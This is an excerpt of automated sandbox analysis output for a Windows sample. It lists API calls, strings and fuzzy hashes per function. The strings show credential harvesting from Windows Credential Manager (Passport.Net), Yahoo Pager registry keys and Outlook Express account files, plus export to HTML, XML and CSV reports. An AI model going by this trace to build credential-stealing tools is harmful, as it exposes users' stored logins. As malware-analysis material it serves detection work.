                  • Instruction Fuzzy Hash: 33018C71280304BFFA226B60EE47FD57BA2AB48B01F008465F348AD0F2CBF129509B08
                  APIs
                  • memset.MSVCRT ref: 00407E9F
                  • sprintf.MSVCRT ref: 00407EB4
                    • Part of subcall function 00407F4F: memset.MSVCRT ref: 00407F73
                    • Part of subcall function 00407F4F: GetPrivateProfileStringA.KERNEL32(004182C0,0000000A,0041344F,?,00001000,004181B8), ref: 00407F95
                    • Part of subcall function 00407F4F: strcpy.MSVCRT(?,?), ref: 00407FAF
                  • SetWindowTextA.USER32(?,?), ref: 00407EDB
                  • EnumChildWindows.USER32(?,Function_00007E17,00000000), ref: 00407EEB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                  • String ID: caption$dialog_%d
                  • API String ID: 246480800-4161923789
                  • Opcode ID: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                  • Instruction ID: c346797357670b32f643cbd36cfbc212eb539bb93902627947de0ac2d0f12ab5
                  • Opcode Fuzzy Hash: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                  • Instruction Fuzzy Hash: DBF0BB3058424D7EDB129750DD06FD97A68AB18746F0400EAFB44E10D1DBF8AAD0875E
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040E3BD,00000000,00000000), ref: 0040E8FD
                  • memset.MSVCRT ref: 0040E95A
                  • memset.MSVCRT ref: 0040E96C
                    • Part of subcall function 0040E7E3: strcpy.MSVCRT(?,-00000001), ref: 0040E809
                  • memset.MSVCRT ref: 0040EA53
                  • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040EA78
                  • CloseHandle.KERNEL32(00000000,0040E3BD,?), ref: 0040EAC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$strcpy$CloseHandleOpenProcess
                  • String ID:
                  • API String ID: 3799309942-0
                  • Opcode ID: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                  • Instruction ID: 2a82ac7989168376751b009825c1859dcdea9a7a89aff0dc4cc4404167d83f81
                  • Opcode Fuzzy Hash: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                  • Instruction Fuzzy Hash: 79512EB1A00218AFDB10DF95CD85ADEBBB8FB48304F1445AAF505A2281DB749F90CF69
                  APIs
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  • strcat.MSVCRT(?,&nbsp;), ref: 004095A1
                  • sprintf.MSVCRT ref: 004095C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWritesprintfstrcatstrlen
                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                  • API String ID: 3813295786-4153097237
                  • Opcode ID: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                  • Instruction ID: d2e4fb28aa3b1966a3fc448ecfbbe776d9831430555dea6067297da34f065eca
                  • Opcode Fuzzy Hash: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                  • Instruction Fuzzy Hash: 4F318F32900209AFDF15DF95C8869DE7BB5FF44314F1041AAFD10AB1E2D776A951CB84
                  APIs
                  • memset.MSVCRT ref: 0040AC8E
                    • Part of subcall function 00407A69: LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                    • Part of subcall function 0040687C: memset.MSVCRT ref: 0040689C
                    • Part of subcall function 0040687C: sprintf.MSVCRT ref: 004068C9
                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068D5
                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 004068EA
                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068F8
                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 00406908
                    • Part of subcall function 004066AF: GetSaveFileNameA.COMDLG32(?), ref: 004066FE
                    • Part of subcall function 004066AF: strcpy.MSVCRT(?,?), ref: 00406715
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$<DA$txt
                  • API String ID: 4021364944-2752249159
                  • Opcode ID: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                  • Instruction ID: b1b2e5a0efe066de17158a8bc8fa7ff9efe1d0f31d50f94681ee96e1b845f603
                  • Opcode Fuzzy Hash: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                  • Instruction Fuzzy Hash: B82101B1E042199ED700EFE6D8817DEBBB4AB08704F10417FE509B7282D7382B458F5A
                  APIs
                  • memset.MSVCRT ref: 00403A8C
                  • memset.MSVCRT ref: 00403AA5
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403ABC
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403ADB
                  • strlen.MSVCRT ref: 00403AED
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                  • String ID:
                  • API String ID: 1786725549-0
                  • Opcode ID: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                  • Instruction ID: 60d5cd2968a458345304ed859c80f0f17d47a7f7ae6e16c58bf0b652b2e175c6
                  • Opcode Fuzzy Hash: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                  • Instruction Fuzzy Hash: B8116DB650012CBEFB009B94DD85DEBB7ADEF08354F0041A2B719E2091D6759F54CB78
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcat$memsetsprintf
                  • String ID: %2.2X
                  • API String ID: 582077193-791839006
                  • Opcode ID: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                  • Instruction ID: 9a6b28ef774d6e53ee32a9c0eecf57d77903bda120735f9d6ade06843e2f5b66
                  • Opcode Fuzzy Hash: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                  • Instruction Fuzzy Hash: 03014C32A042152AD73266569C02BEB3B9C9B58708F10817FF944E51C2EAFCD6D4879D
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 607c23ff0e486e070c5426f82ff3d7a24f97f784535b6e080ccd99acf642cc13
                  • Instruction ID: 21774ca54697e01c1adc3851c2de10052fd52e5bfec277bf8b6dbebc5e22beff
                  • Opcode Fuzzy Hash: 607c23ff0e486e070c5426f82ff3d7a24f97f784535b6e080ccd99acf642cc13
                  • Instruction Fuzzy Hash: 55014872906D316BC5357A3559017DBA3947F05B19B06020FFA09B73424BAC7CE0C9DD
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004016F4
                  • GetSystemMetrics.USER32(00000015), ref: 00401702
                  • GetSystemMetrics.USER32(00000014), ref: 0040170E
                  • BeginPaint.USER32(?,?), ref: 00401728
                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 00401737
                  • EndPaint.USER32(?,?), ref: 00401744
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                  • String ID:
                  • API String ID: 19018683-0
                  • Opcode ID: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                  • Instruction ID: 87b9e555b8a68b0804226e1a7d1b9f87043edf3c617a3ea881a1d9d020f86292
                  • Opcode Fuzzy Hash: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                  • Instruction Fuzzy Hash: 0D01FB72900218BFDF04DFA8DC499FE7BBDFB45702F004469EE11AA194DAB1AA08CB54
                  APIs
                  • memset.MSVCRT ref: 00411A30
                  • memset.MSVCRT ref: 00411A49
                  • memset.MSVCRT ref: 00411A5D
                    • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                  • strlen.MSVCRT ref: 00411A79
                  • memcpy.MSVCRT ref: 00411A9E
                  • memcpy.MSVCRT ref: 00411AB4
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                    • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                  • memcpy.MSVCRT ref: 00411AF4
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpymemset$strlen
                  • String ID:
                  • API String ID: 2142929671-0
                  • Opcode ID: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                  • Instruction ID: 6f2ed515a41b06c6c22f205846f23ff7f18478afa58802cd03ca93c0f6d1378b
                  • Opcode Fuzzy Hash: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                  • Instruction Fuzzy Hash: 29512B7290015DAACB14DF55CC81AEEB7A9FF04308F5441BAE609E7151EB34AA89CF98
                  APIs
                  • memset.MSVCRT ref: 0040B548
                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B58C
                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B5A6
                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040B649
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$MenuPostSendStringmemset
                  • String ID: 84A
                  • API String ID: 3798638045-1875439563
                  • Opcode ID: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                  • Instruction ID: f81f675eeec9d049c2f837a36ed854dba7505ce636643832e7163bdc5c509590
                  • Opcode Fuzzy Hash: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                  • Instruction Fuzzy Hash: F141E130600611EFCB259F24CC85AA6BBA4FF04325F1486B6E958AB2C5C378DD91CBDD
                  APIs
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,76DBEC10), ref: 0040465E
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                  • strlen.MSVCRT ref: 0040DD15
                  • strcpy.MSVCRT(?,?), ref: 0040DD26
                  • LocalFree.KERNEL32(?), ref: 0040DD33
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                  • String ID: Passport.Net\*
                  • API String ID: 3335197805-3671122194
                  • Opcode ID: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                  • Instruction ID: efac9c12738a0d8289842d1efaad299d98c72222a78c1cf1bd4cf7de0e5ce36b
                  • Opcode Fuzzy Hash: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                  • Instruction Fuzzy Hash: 47313AB6E00109ABDB10EF96DD45DEE7BB8EF85304F10007AE605F7291D7389A45CB68
                  APIs
                    • Part of subcall function 00403127: strchr.MSVCRT ref: 0040323C
                  • memset.MSVCRT ref: 004032CC
                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 004032E6
                  • strchr.MSVCRT ref: 0040331B
                    • Part of subcall function 004023C6: _mbsicmp.MSVCRT ref: 004023FE
                  • strlen.MSVCRT ref: 0040335D
                    • Part of subcall function 004023C6: _mbscmp.MSVCRT ref: 004023DA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                  • String ID: Personalities
                  • API String ID: 2103853322-4287407858
                  • Opcode ID: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                  • Instruction ID: a1e53a31d12307489e3dcdfde72dead8da93f466afb76ebe56892d48a8bd1a3f
                  • Opcode Fuzzy Hash: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                  • Instruction Fuzzy Hash: 2A21D676A041096EDB10AF699D81ADE7F6C9F00309F1440BBEA04F3181DB789B86866D
                  APIs
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Cursor_mbsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 882979914-1578091866
                  • Opcode ID: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                  • Instruction ID: d235f9a75b77abe912022d820ae93ced97f95949ab3107a8ace45c524b087071
                  • Opcode Fuzzy Hash: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                  • Instruction Fuzzy Hash: 5421C170704602EFC719EF75C884A95B7A9FF48314B10413EF529A7291DB39AC218B8A
                  APIs
                  • memset.MSVCRT ref: 00411644
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                  Strings
                  Yara matches
                  Similarity
                  • API ID: CloseOpenQueryValuememset
                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                  • API String ID: 1830152886-1703613266
                  • Opcode ID: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                  • Instruction ID: 516cda371f3396bdfc4173c93ac40c9cbeab8f1746814b3412c432ea0c8be721
                  • Opcode Fuzzy Hash: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                  • Instruction Fuzzy Hash: 8401C4B5A00018FBDB109A15CD01FDE7A6D9B90354F040072FF08F2221F2358F599A98
                  APIs
                  • GetLastError.KERNEL32(?), ref: 00405F5B
                  • sprintf.MSVCRT ref: 00405F83
                  • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00405F9C
                  Strings
                  Yara matches
                  Similarity
                  • API ID: ErrorLastMessagesprintf
                  • String ID: Error$Error %d: %s
                  • API String ID: 1670431679-1552265934
                  • Opcode ID: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                  • Instruction ID: f1cbc3d381c34e383a1f44b31e9a73e3da945176662b790f0432ac9700464d50
                  • Opcode Fuzzy Hash: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                  • Instruction Fuzzy Hash: 90F0A77680010977CB10AB64CC06FDB77BCAB44704F140076BB45E2140EA74DB458EA8
                  APIs
                  • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,753D8FB0,00405C4B,00000000), ref: 0040F6B1
                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F6BF
                  • FreeLibrary.KERNEL32(00000000), ref: 0040F6D7
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: SHAutoComplete$shlwapi.dll
                  • API String ID: 145871493-1506664499
                  • Opcode ID: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                  • Instruction ID: ed3b1cda8c3177e5f4c950405da88c53b72577223da9c459121c2a3053d1176f
                  • Opcode Fuzzy Hash: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                  • Instruction Fuzzy Hash: 5AD02B313002106BDA305F21BC09EEF3DEDEFC47937018032F800D2164DB258D0281AC
                  APIs
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  • memset.MSVCRT ref: 0040983E
                    • Part of subcall function 0040F70E: memcpy.MSVCRT ref: 0040F77C
                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                  • sprintf.MSVCRT ref: 00409883
                  Strings
                  Yara matches
                  Similarity
                  • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                  • String ID: <%s>%s</%s>$</item>$<item>
                  • API String ID: 3200591283-2769808009
                  • Opcode ID: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                  • Instruction ID: 22b2cf82475c3b06c8668363684e5b6771b4bc8edfe41877af386eb7fddec59d
                  • Opcode Fuzzy Hash: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                  • Instruction Fuzzy Hash: 4B11A331600616BFDB11AF15CC42E967B64FF0831CF10017AF909666A2D77ABDA4DF98
                  APIs
                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 0041128A
                  • ??2@YAPAXI@Z.MSVCRT ref: 0041129C
                  • SetFilePointer.KERNEL32(0041141B,00000002,00000000,00000000,?,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112AB
                    • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                    • Part of subcall function 00411133: wcslen.MSVCRT ref: 00411146
                    • Part of subcall function 00411133: ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                    • Part of subcall function 00411133: WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                    • Part of subcall function 00411133: strlen.MSVCRT ref: 004111AB
                    • Part of subcall function 00411133: memcpy.MSVCRT ref: 004111C5
                    • Part of subcall function 00411133: ??3@YAXPAX@Z.MSVCRT ref: 00411258
                  • ??3@YAXPAX@Z.MSVCRT ref: 004112D6
                  • CloseHandle.KERNEL32(0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112E0
                  Yara matches
                  Similarity
                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                  • String ID:
                  • API String ID: 1886237854-0
                  • Opcode ID: a9cfe04fa5bdd51d8bf4059786eaa6f11c0805747c75d5ba186b56019847d930
                  • Instruction ID: e21230228d1277bb6eddc604f6d9b170c83676d8100b74bfcef0317b0316c018
                  • Opcode Fuzzy Hash: a9cfe04fa5bdd51d8bf4059786eaa6f11c0805747c75d5ba186b56019847d930
                  • Instruction Fuzzy Hash: BA01B532404248BEDB106F75EC4DDDBBFACEF59368710816BF958C62A0DA358D54CB68
                  APIs
                  • GetParent.USER32(?), ref: 00407D75
                  • GetWindowRect.USER32(?,?), ref: 00407D82
                  • GetClientRect.USER32(00000000,?), ref: 00407D8D
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00407D9D
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407DB9
                  Yara matches
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                  • Instruction ID: 038819a919944698b8d7aadaf115a7119d50e81e4b6eee93b7f6b8021a4f8f43
                  • Opcode Fuzzy Hash: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                  • Instruction Fuzzy Hash: F7015A32801129BBDB11AFA59C49EFFBFBCEF46751F04812AFD05A2140D738A605CBA5
                  APIs
                  • memset.MSVCRT ref: 004099FD
                  • memset.MSVCRT ref: 00409A13
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
